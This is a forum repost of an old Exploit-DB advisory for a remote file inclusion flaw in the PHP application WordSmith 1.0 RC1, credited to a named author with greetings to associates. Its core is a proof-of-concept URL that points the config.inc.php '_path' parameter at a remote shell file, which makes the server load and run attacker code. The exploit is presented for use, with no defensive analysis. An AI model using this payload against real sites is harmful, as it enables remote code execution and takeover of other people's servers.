Exploit Wordsmith 1.1b - 'config.inc.php?_path' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4446
Проверка EDB
  1. Пройдено
Автор
SHOCKSHADOW
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-5102
Дата публикации
2007-09-23
Код:
--==+=================== Electronic Security Team (www.Yee7.com) ====================+==--
--==+            WordSmith 1.0 RC1 (config.inc.php) Remote File Inclusion            +==--
--==+================================================================================+==--

Software:     WordSmith 1.0 RC1
SF page:      http://sourceforge.net/news/?group_id=90418
exploit:      Remote File Inclusion [High Risk]
By:           ShockShadow - Electronic Security Team (www.Yee7.com)
Home:         www.Yee7.com
Download:     http://skrypty.webpc.pl/pobierz13.html

##############################

==============
Dork: built in ;)

PoC:
http://domain.com/Script_Path/config.inc.php?_path=http://shell.txt?
###############################

by: ShockShadow
Thanks to: Mr-m07, Al-Shikh, ThE WhitE WolF, HuRrIcAnE, S0m.Ph, KEENEST, Qanas Alyahood, Falcon Hammdan, ArabHacker
AND ALL FRIENDS 

# milw0rm.com [2007-09-23]
 
Источник
www.exploit-db.com

Похожие темы